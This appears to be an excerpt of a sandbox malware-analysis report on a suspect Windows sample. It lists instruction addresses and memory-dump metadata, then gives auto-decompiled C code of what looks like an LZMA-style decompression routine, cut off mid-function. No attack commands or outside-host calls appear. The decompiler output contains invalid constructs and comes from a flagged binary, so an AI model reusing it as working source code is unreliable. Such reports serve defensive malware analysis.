                                                                                                                          0x00406ed6
                                                                                                                          0x00406edc
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406ede
                                                                                                                          0x00406ee1
                                                                                                                          0x00406ee4
                                                                                                                          0x00406ee7
                                                                                                                          0x00406eea
                                                                                                                          0x00406eed
                                                                                                                          0x00406ef0
                                                                                                                          0x00406ef3
                                                                                                                          0x00406ef6
                                                                                                                          0x00406ef9
                                                                                                                          0x00406efc
                                                                                                                          0x00406f14
                                                                                                                          0x00406f17
                                                                                                                          0x00406f1a
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f1d
                                                                                                                          0x00406f20
                                                                                                                          0x00406f24
                                                                                                                          0x00406f26
                                                                                                                          0x00406efe
                                                                                                                          0x00406efe
                                                                                                                          0x00406f06
                                                                                                                          0x00406f0b
                                                                                                                          0x00406f0d
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f0f
                                                                                                                          0x00406f29
                                                                                                                          0x00406f30
                                                                                                                          0x00406f33
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00000000
                                                                                                                          0x00406f35
                                                                                                                          0x00406f33
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00406f3a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f75
                                                                                                                          0x00406f75
                                                                                                                          0x00406f79
                                                                                                                          0x00407581
                                                                                                                          0x00000000
                                                                                                                          0x00407581
                                                                                                                          0x00406f7f
                                                                                                                          0x00406f82
                                                                                                                          0x00406f85
                                                                                                                          0x00406f89
                                                                                                                          0x00406f8c
                                                                                                                          0x00406f92
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f94
                                                                                                                          0x00406f97
                                                                                                                          0x00406f9a
                                                                                                                          0x00406f9a
                                                                                                                          0x00406fa0
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f3e
                                                                                                                          0x00406f41
                                                                                                                          0x00000000
                                                                                                                          0x00406f41
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa2
                                                                                                                          0x00406fa5
                                                                                                                          0x00406fa8
                                                                                                                          0x00406fab
                                                                                                                          0x00406fae
                                                                                                                          0x00406fb1
                                                                                                                          0x00406fb4
                                                                                                                          0x00406fb7
                                                                                                                          0x00406fba
                                                                                                                          0x00406fbd
                                                                                                                          0x00406fc0
                                                                                                                          0x00406fd8
                                                                                                                          0x00406fdb
                                                                                                                          0x00406fde
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe1
                                                                                                                          0x00406fe4
                                                                                                                          0x00406fe8
                                                                                                                          0x00406fea
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fc2
                                                                                                                          0x00406fca
                                                                                                                          0x00406fcf
                                                                                                                          0x00406fd1
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fd3
                                                                                                                          0x00406fed
                                                                                                                          0x00406ff4
                                                                                                                          0x00406ff7
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00406ff9
                                                                                                                          0x00000000
                                                                                                                          0x00407286
                                                                                                                          0x00407286
                                                                                                                          0x0040728a
                                                                                                                          0x004075b1
                                                                                                                          0x00000000
                                                                                                                          0x004075b1
                                                                                                                          0x00407290
                                                                                                                          0x00407293
                                                                                                                          0x00407296
                                                                                                                          0x0040729a
                                                                                                                          0x0040729d
                                                                                                                          0x004072a3
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a5
                                                                                                                          0x004072a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407395
                                                                                                                          0x00407399
                                                                                                                          0x004073bb
                                                                                                                          0x004073be
                                                                                                                          0x004073c8
                                                                                                                          0x00000000
                                                                                                                          0x004073c8
                                                                                                                          0x0040739b
                                                                                                                          0x0040739e
                                                                                                                          0x004073a2
                                                                                                                          0x004073a5
                                                                                                                          0x004073a5
                                                                                                                          0x004073a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407452
                                                                                                                          0x00407456
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x00407474
                                                                                                                          0x0040747b
                                                                                                                          0x00407482
                                                                                                                          0x00407489
                                                                                                                          0x00407489
                                                                                                                          0x00000000
                                                                                                                          0x00407489
                                                                                                                          0x00407458
                                                                                                                          0x0040745b
                                                                                                                          0x0040745e
                                                                                                                          0x00407461
                                                                                                                          0x00407468
                                                                                                                          0x004073ac
                                                                                                                          0x004073ac
                                                                                                                          0x004073af
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407543
                                                                                                                          0x00407546
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040717d
                                                                                                                          0x0040717f
                                                                                                                          0x00407186
                                                                                                                          0x00407187
                                                                                                                          0x00407189
                                                                                                                          0x0040718c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407194
                                                                                                                          0x00407197
                                                                                                                          0x0040719a
                                                                                                                          0x0040719c
                                                                                                                          0x0040719e
                                                                                                                          0x0040719e
                                                                                                                          0x0040719f
                                                                                                                          0x004071a2
                                                                                                                          0x004071a9
                                                                                                                          0x004071ac
                                                                                                                          0x004071ba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407490
                                                                                                                          0x00407490
                                                                                                                          0x00407493
                                                                                                                          0x0040749a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040749f
                                                                                                                          0x0040749f
                                                                                                                          0x004074a3
                                                                                                                          0x004075db
                                                                                                                          0x00000000
                                                                                                                          0x004075db
                                                                                                                          0x004074a9
                                                                                                                          0x004074ac
                                                                                                                          0x004074af
                                                                                                                          0x004074b3
                                                                                                                          0x004074b6
                                                                                                                          0x004074bc
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074be
                                                                                                                          0x004074c1
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c4
                                                                                                                          0x004074c7
                                                                                                                          0x004074c7
                                                                                                                          0x004074cb
                                                                                                                          0x0040752b
                                                                                                                          0x0040752e
                                                                                                                          0x00407533
                                                                                                                          0x00407534
                                                                                                                          0x00407536
                                                                                                                          0x00407538
                                                                                                                          0x0040753b
                                                                                                                          0x00000000
                                                                                                                          0x0040753b
                                                                                                                          0x004074cd
                                                                                                                          0x004074d3
                                                                                                                          0x004074d6
                                                                                                                          0x004074d9
                                                                                                                          0x004074dc
                                                                                                                          0x004074df
                                                                                                                          0x004074e2
                                                                                                                          0x004074e5
                                                                                                                          0x004074e8
                                                                                                                          0x004074eb
                                                                                                                          0x004074ee
                                                                                                                          0x00407507
                                                                                                                          0x0040750a
                                                                                                                          0x0040750d
                                                                                                                          0x00407510
                                                                                                                          0x00407514
                                                                                                                          0x00407516
                                                                                                                          0x00407516
                                                                                                                          0x00407517
                                                                                                                          0x0040751a
                                                                                                                          0x004074f0
                                                                                                                          0x004074f0
                                                                                                                          0x004074f8
                                                                                                                          0x004074fd
                                                                                                                          0x004074ff
                                                                                                                          0x00407502
                                                                                                                          0x00407502
                                                                                                                          0x0040751d
                                                                                                                          0x00407524
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x00407526
                                                                                                                          0x00000000
                                                                                                                          0x004071c2
                                                                                                                          0x004071c5
                                                                                                                          0x004071fb
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732b
                                                                                                                          0x0040732e
                                                                                                                          0x0040732e
                                                                                                                          0x00407331
                                                                                                                          0x00407333
                                                                                                                          0x004075bd
                                                                                                                          0x00000000
                                                                                                                          0x004075bd
                                                                                                                          0x00407339
                                                                                                                          0x0040733c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407342
                                                                                                                          0x00407346
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00407349
                                                                                                                          0x00000000
                                                                                                                          0x00407349
                                                                                                                          0x004071c7
                                                                                                                          0x004071c9
                                                                                                                          0x004071cb
                                                                                                                          0x004071cd
                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d5
                                                                                                                          0x004071d8
                                                                                                                          0x004071db
                                                                                                                          0x004071f1
                                                                                                                          0x004071f6
                                                                                                                          0x0040722e
                                                                                                                          0x0040722e
                                                                                                                          0x00407232
                                                                                                                          0x0040725e
                                                                                                                          0x00407260
                                                                                                                          0x00407267
                                                                                                                          0x0040726a
                                                                                                                          0x0040726d
                                                                                                                          0x0040726d
                                                                                                                          0x00407272
                                                                                                                          0x00407272
                                                                                                                          0x00407274
                                                                                                                          0x00407277
                                                                                                                          0x0040727e
                                                                                                                          0x00407281
                                                                                                                          0x004072ae
                                                                                                                          0x004072ae
                                                                                                                          0x004072b1
                                                                                                                          0x004072b4
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00407328
                                                                                                                          0x00000000
                                                                                                                          0x00407328
                                                                                                                          0x004072b6
                                                                                                                          0x004072bc
                                                                                                                          0x004072bf
                                                                                                                          0x004072c2
                                                                                                                          0x004072c5
                                                                                                                          0x004072c8
                                                                                                                          0x004072cb
                                                                                                                          0x004072ce
                                                                                                                          0x004072d1
                                                                                                                          0x004072d4
                                                                                                                          0x004072d7
                                                                                                                          0x004072f0
                                                                                                                          0x004072f2
                                                                                                                          0x004072f5
                                                                                                                          0x004072f6
                                                                                                                          0x004072f9
                                                                                                                          0x004072fb
                                                                                                                          0x004072fe
                                                                                                                          0x00407300
                                                                                                                          0x00407302
                                                                                                                          0x00407305
                                                                                                                          0x00407307
                                                                                                                          0x0040730a
                                                                                                                          0x0040730e
                                                                                                                          0x00407310
                                                                                                                          0x00407310
                                                                                                                          0x00407311
                                                                                                                          0x00407314
                                                                                                                          0x00407317
                                                                                                                          0x004072d9
                                                                                                                          0x004072d9
                                                                                                                          0x004072e1
                                                                                                                          0x004072e6
                                                                                                                          0x004072e8
                                                                                                                          0x004072eb
                                                                                                                          0x004072eb
                                                                                                                          0x0040731a
                                                                                                                          0x00407321
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x004072ab
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00000000
                                                                                                                          0x00407323
                                                                                                                          0x00407321
                                                                                                                          0x00407234
                                                                                                                          0x00407237
                                                                                                                          0x00407239
                                                                                                                          0x0040723c
                                                                                                                          0x0040723f
                                                                                                                          0x00407242
                                                                                                                          0x00407244
                                                                                                                          0x00407247
                                                                                                                          0x0040724a
                                                                                                                          0x0040724a
                                                                                                                          0x0040724d
                                                                                                                          0x0040724d
                                                                                                                          0x00407250
                                                                                                                          0x00407257
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x0040722b
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00000000
                                                                                                                          0x00407259
                                                                                                                          0x00407257
                                                                                                                          0x004071dd
                                                                                                                          0x004071e0
                                                                                                                          0x004071e2
                                                                                                                          0x004071e5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406f44
                                                                                                                          0x00406f44
                                                                                                                          0x00406f48
                                                                                                                          0x0040758d
                                                                                                                          0x00000000
                                                                                                                          0x0040758d
                                                                                                                          0x00406f4e
                                                                                                                          0x00406f51
                                                                                                                          0x00406f54
                                                                                                                          0x00406f57
                                                                                                                          0x00406f5a
                                                                                                                          0x00406f5d
                                                                                                                          0x00406f60
                                                                                                                          0x00406f62
                                                                                                                          0x00406f65
                                                                                                                          0x00406f68
                                                                                                                          0x00406f6b
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00406f6d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x0040734c
                                                                                                                          0x00407350
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00407356
                                                                                                                          0x00407359
                                                                                                                          0x0040735c
                                                                                                                          0x0040735f
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407361
                                                                                                                          0x00407364
                                                                                                                          0x00407367
                                                                                                                          0x0040736a
                                                                                                                          0x0040736d
                                                                                                                          0x00407370
                                                                                                                          0x00407373
                                                                                                                          0x00407374
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407376
                                                                                                                          0x00407379
                                                                                                                          0x0040737c
                                                                                                                          0x0040737f
                                                                                                                          0x00407382
                                                                                                                          0x00407385
                                                                                                                          0x00407389
                                                                                                                          0x0040738b
                                                                                                                          0x0040738e
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x00000000
                                                                                                                          0x00407390
                                                                                                                          0x0040738e
                                                                                                                          0x004075c3
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bf2

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.33051309738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.33051278337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051370538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051404339.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051528806.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051549373.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051594740.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000001.00000002.33051637884.000000000044B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                          • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                                                          • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                                                          • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E00406BB0(void* __ecx) {
                                                                                                                          				void* _v8;
                                                                                                                          				void* _v12;
                                                                                                                          				signed int _v16;
                                                                                                                          				unsigned int _v20;
                                                                                                                          				signed int _v24;
                                                                                                                          				signed int _v28;
                                                                                                                          				signed int _v32;
                                                                                                                          				signed int _v36;
                                                                                                                          				signed int _v40;
                                                                                                                          				signed int _v44;
                                                                                                                          				signed int _v48;
                                                                                                                          				signed int _v52;
                                                                                                                          				signed int _v56;
                                                                                                                          				signed int _v60;
                                                                                                                          				signed int _v64;
                                                                                                                          				signed int _v68;
                                                                                                                          				signed int _v72;
                                                                                                                          				signed int _v76;
                                                                                                                          				signed int _v80;
                                                                                                                          				signed int _v84;
                                                                                                                          				signed int _v88;
                                                                                                                          				signed int _v92;
                                                                                                                          				signed int _v95;
                                                                                                                          				signed int _v96;
                                                                                                                          				signed int _v100;
                                                                                                                          				signed int _v104;
                                                                                                                          				signed int _v108;
                                                                                                                          				signed int _v112;
                                                                                                                          				signed int _v116;
                                                                                                                          				signed int _v120;
                                                                                                                          				intOrPtr _v124;
                                                                                                                          				signed int _v128;
                                                                                                                          				signed int _v132;
                                                                                                                          				signed int _v136;
                                                                                                                          				void _v140;
                                                                                                                          				void* _v148;
                                                                                                                          				signed int _t537;
                                                                                                                          				signed int _t538;
                                                                                                                          				signed int _t572;
                                                                                                                          
                                                                                                                          				_t572 = 0x22;
                                                                                                                          				_v148 = __ecx;
                                                                                                                          				memcpy( &_v140, __ecx, _t572 << 2);
                                                                                                                          				if(_v52 == 0xffffffff) {
                                                                                                                          					return 1;
                                                                                                                          				}
                                                                                                                          				while(1) {
                                                                                                                          					L3:
                                                                                                                          					_t537 = _v140;
                                                                                                                          					if(_t537 > 0x1c) {
                                                                                                                          						break;
                                                                                                                          					}
                                                                                                                          					switch( *((intOrPtr*)(_t537 * 4 +  &M00407602))) {
                                                                                                                          						case 0:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v116 = _v116 + 1;
                                                                                                                          							_t537 =  *_v116;
                                                                                                                          							__eflags = _t537 - 0xe1;
                                                                                                                          							if(_t537 > 0xe1) {
                                                                                                                          								goto L174;
                                                                                                                          							}
                                                                                                                          							_t542 = _t537 & 0x000000ff;
                                                                                                                          							_push(0x2d);
                                                                                                                          							asm("cdq");
                                                                                                                          							_pop(_t576);
                                                                                                                          							_push(9);
                                                                                                                          							_pop(_t577);
                                                                                                                          							_t622 = _t542 / _t576;
                                                                                                                          							_t544 = _t542 % _t576 & 0x000000ff;
                                                                                                                          							asm("cdq");
                                                                                                                          							_t617 = _t544 % _t577 & 0x000000ff;
                                                                                                                          							_v64 = _t617;
                                                                                                                          							_v32 = (1 << _t622) - 1;
                                                                                                                          							_v28 = (1 << _t544 / _t577) - 1;
                                                                                                                          							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                                                                                                          							__eflags = 0x600 - _v124;
                                                                                                                          							if(0x600 == _v124) {
                                                                                                                          								L12:
                                                                                                                          								__eflags = _t625;
                                                                                                                          								if(_t625 == 0) {
                                                                                                                          									L14:
                                                                                                                          									_v76 = _v76 & 0x00000000;
                                                                                                                          									_v68 = _v68 & 0x00000000;
                                                                                                                          									goto L17;
                                                                                                                          								} else {
                                                                                                                          									goto L13;
                                                                                                                          								}
                                                                                                                          								do {
                                                                                                                          									L13:
                                                                                                                          									_t625 = _t625 - 1;
                                                                                                                          									__eflags = _t625;
                                                                                                                          									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                                                                                                          								} while (_t625 != 0);
                                                                                                                          								goto L14;
                                                                                                                          							}
                                                                                                                          							__eflags = _v8;
                                                                                                                          							if(_v8 != 0) {
                                                                                                                          								GlobalFree(_v8);
                                                                                                                          							}
                                                                                                                          							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                          							__eflags = _t537;
                                                                                                                          							_v8 = _t537;
                                                                                                                          							if(_t537 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							} else {
                                                                                                                          								_v124 = 0x600;
                                                                                                                          								goto L12;
                                                                                                                          							}
                                                                                                                          						case 1:
                                                                                                                          							L15:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 1;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                                                                                                          							_v116 = _v116 + 1;
                                                                                                                          							_t50 =  &_v76;
                                                                                                                          							 *_t50 = _v76 + 1;
                                                                                                                          							__eflags =  *_t50;
                                                                                                                          							L17:
                                                                                                                          							__eflags = _v76 - 4;
                                                                                                                          							if(_v76 < 4) {
                                                                                                                          								goto L15;
                                                                                                                          							}
                                                                                                                          							_t550 = _v68;
                                                                                                                          							__eflags = _t550 - _v120;
                                                                                                                          							if(_t550 == _v120) {
                                                                                                                          								L22:
                                                                                                                          								_v76 = 5;
                                                                                                                          								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                                                                                                          								goto L25;
                                                                                                                          							}
                                                                                                                          							__eflags = _v12;
                                                                                                                          							_v120 = _t550;
                                                                                                                          							if(_v12 != 0) {
                                                                                                                          								GlobalFree(_v12);
                                                                                                                          							}
                                                                                                                          							_t537 = GlobalAlloc(0x40, _v68); // executed
                                                                                                                          							__eflags = _t537;
                                                                                                                          							_v12 = _t537;
                                                                                                                          							if(_t537 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							} else {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          						case 2:
                                                                                                                          							L26:
                                                                                                                          							_t557 = _v100 & _v32;
                                                                                                                          							_v136 = 6;
                                                                                                                          							_v80 = _t557;
                                                                                                                          							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                                                                                                          							goto L135;
                                                                                                                          						case 3:
                                                                                                                          							L23:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 3;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_t72 =  &_v116;
                                                                                                                          							 *_t72 = _v116 + 1;
                                                                                                                          							__eflags =  *_t72;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L25:
                                                                                                                          							_v76 = _v76 - 1;
                                                                                                                          							__eflags = _v76;
                                                                                                                          							if(_v76 != 0) {
                                                                                                                          								goto L23;
                                                                                                                          							}
                                                                                                                          							goto L26;
                                                                                                                          						case 4:
                                                                                                                          							L136:
                                                                                                                          							_t559 =  *_t626;
                                                                                                                          							_t610 = _t559 & 0x0000ffff;
                                                                                                                          							_t591 = (_v20 >> 0xb) * _t610;
                                                                                                                          							__eflags = _v16 - _t591;
                                                                                                                          							if(_v16 >= _t591) {
                                                                                                                          								_v20 = _v20 - _t591;
                                                                                                                          								_v16 = _v16 - _t591;
                                                                                                                          								_v68 = 1;
                                                                                                                          								_t560 = _t559 - (_t559 >> 5);
                                                                                                                          								__eflags = _t560;
                                                                                                                          								 *_t626 = _t560;
                                                                                                                          							} else {
                                                                                                                          								_v20 = _t591;
                                                                                                                          								_v68 = _v68 & 0x00000000;
                                                                                                                          								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                                                                                                          							}
                                                                                                                          							__eflags = _v20 - 0x1000000;
                                                                                                                          							if(_v20 >= 0x1000000) {
                                                                                                                          								goto L142;
                                                                                                                          							} else {
                                                                                                                          								goto L140;
                                                                                                                          							}
                                                                                                                          						case 5:
                                                                                                                          							L140:
                                                                                                                          							__eflags = _v112;
                                                                                                                          							if(_v112 == 0) {
                                                                                                                          								_v140 = 5;
                                                                                                                          								goto L173;
                                                                                                                          							}
                                                                                                                          							_v20 = _v20 << 8;
                                                                                                                          							_v112 = _v112 - 1;
                                                                                                                          							_t464 =  &_v116;
                                                                                                                          							 *_t464 = _v116 + 1;
                                                                                                                          							__eflags =  *_t464;
                                                                                                                          							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                                                                                                          							L142:
                                                                                                                          							_t561 = _v136;
                                                                                                                          							goto L143;
                                                                                                                          						case 6:
                                                                                                                          							__edx = 0;
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v56 = 1;
                                                                                                                          								_v136 = 7;
                                                                                                                          								__esi = _v8 + 0x180 + _v60 * 2;
                                                                                                                          								goto L135;
                                                                                                                          							}
                                                                                                                          							__eax = _v96 & 0x000000ff;
                                                                                                                          							__esi = _v100;
                                                                                                                          							__cl = 8;
                                                                                                                          							__cl = 8 - _v64;
                                                                                                                          							__esi = _v100 & _v28;
                                                                                                                          							__eax = (_v96 & 0x000000ff) >> 8;
                                                                                                                          							__ecx = _v64;
                                                                                                                          							__esi = (_v100 & _v28) << 8;
                                                                                                                          							__ecx = _v8;
                                                                                                                          							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                                                                                                          							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                                                                                                          							__eflags = _v60 - 4;
                                                                                                                          							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                          							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                                                                                                          							if(_v60 >= 4) {
                                                                                                                          								__eflags = _v60 - 0xa;
                                                                                                                          								if(_v60 >= 0xa) {
                                                                                                                          									_t103 =  &_v60;
                                                                                                                          									 *_t103 = _v60 - 6;
                                                                                                                          									__eflags =  *_t103;
                                                                                                                          								} else {
                                                                                                                          									_v60 = _v60 - 3;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_v60 = 0;
                                                                                                                          							}
                                                                                                                          							__eflags = _v56 - __edx;
                                                                                                                          							if(_v56 == __edx) {
                                                                                                                          								__ebx = 0;
                                                                                                                          								__ebx = 1;
                                                                                                                          								goto L63;
                                                                                                                          							}
                                                                                                                          							__eax = _v24;
                                                                                                                          							__eax = _v24 - _v48;
                                                                                                                          							__eflags = __eax - _v120;
                                                                                                                          							if(__eax >= _v120) {
                                                                                                                          								__eax = __eax + _v120;
                                                                                                                          								__eflags = __eax;
                                                                                                                          							}
                                                                                                                          							__ecx = _v12;
                                                                                                                          							__ebx = 0;
                                                                                                                          							__ebx = 1;
                                                                                                                          							__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                                                                                                          							goto L43;
                                                                                                                          						case 7:
                                                                                                                          							__eflags = _v68 - 1;
                                                                                                                          							if(_v68 != 1) {
                                                                                                                          								__eax = _v40;
                                                                                                                          								_v132 = 0x16;
                                                                                                                          								_v36 = _v40;
                                                                                                                          								__eax = _v44;
                                                                                                                          								_v40 = _v44;
                                                                                                                          								__eax = _v48;
                                                                                                                          								_v44 = _v48;
                                                                                                                          								__eax = 0;
                                                                                                                          								__eflags = _v60 - 7;
                                                                                                                          								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                                                          								__al = __al & 0x000000fd;
                                                                                                                          								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								_v60 = (__eflags >= 0) - 1 + 0xa;
                                                                                                                          								__eax = _v8;
                                                                                                                          								__eax = _v8 + 0x664;
                                                                                                                          								__eflags = __eax;
                                                                                                                          								_v92 = __eax;
                                                                                                                          								goto L71;
                                                                                                                          							}
                                                                                                                          							__eax = _v8;
                                                                                                                          							__ecx = _v60;
                                                                                                                          							_v136 = 8;
                                                                                                                          							__esi = _v8 + 0x198 + _v60 * 2;
                                                                                                                          							goto L135;
                                                                                                                          						case 8:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v136 = 0xa;
                                                                                                                          								__esi = _v8 + 0x1b0 + _v60 * 2;
                                                                                                                          							} else {
                                                                                                                          								__eax = _v60;
                                                                                                                          								__ecx = _v8;
                                                                                                                          								__eax = _v60 + 0xf;
                                                                                                                          								_v136 = 9;
                                                                                                                          								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                                                                                                          								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                                                                                                          							}
                                                                                                                          							goto L135;
                                                                                                                          						case 9:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								goto L92;
                                                                                                                          							}
                                                                                                                          							__eflags = _v100;
                                                                                                                          							if(_v100 == 0) {
                                                                                                                          								goto L174;
                                                                                                                          							}
                                                                                                                          							__eax = 0;
                                                                                                                          							__eflags = _v60 - 7;
                                                                                                                          							_t264 = _v60 - 7 >= 0;
                                                                                                                          							__eflags = _t264;
                                                                                                                          							0 | _t264 = _t264 + _t264 + 9;
                                                                                                                          							_v60 = _t264 + _t264 + 9;
                                                                                                                          							goto L78;
                                                                                                                          						case 0xa:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__eax = _v8;
                                                                                                                          								__ecx = _v60;
                                                                                                                          								_v136 = 0xb;
                                                                                                                          								__esi = _v8 + 0x1c8 + _v60 * 2;
                                                                                                                          								goto L135;
                                                                                                                          							}
                                                                                                                          							__eax = _v44;
                                                                                                                          							goto L91;
                                                                                                                          						case 0xb:
                                                                                                                          							__eflags = _v68;
                                                                                                                          							if(_v68 != 0) {
                                                                                                                          								__ecx = _v40;
                                                                                                                          								__eax = _v36;
                                                                                                                          								_v36 = _v40;
                                                                                                                          							} else {
                                                                                                                          								__eax = _v40;
                                                                                                                          							}
                                                                                                                          							__ecx = _v44;
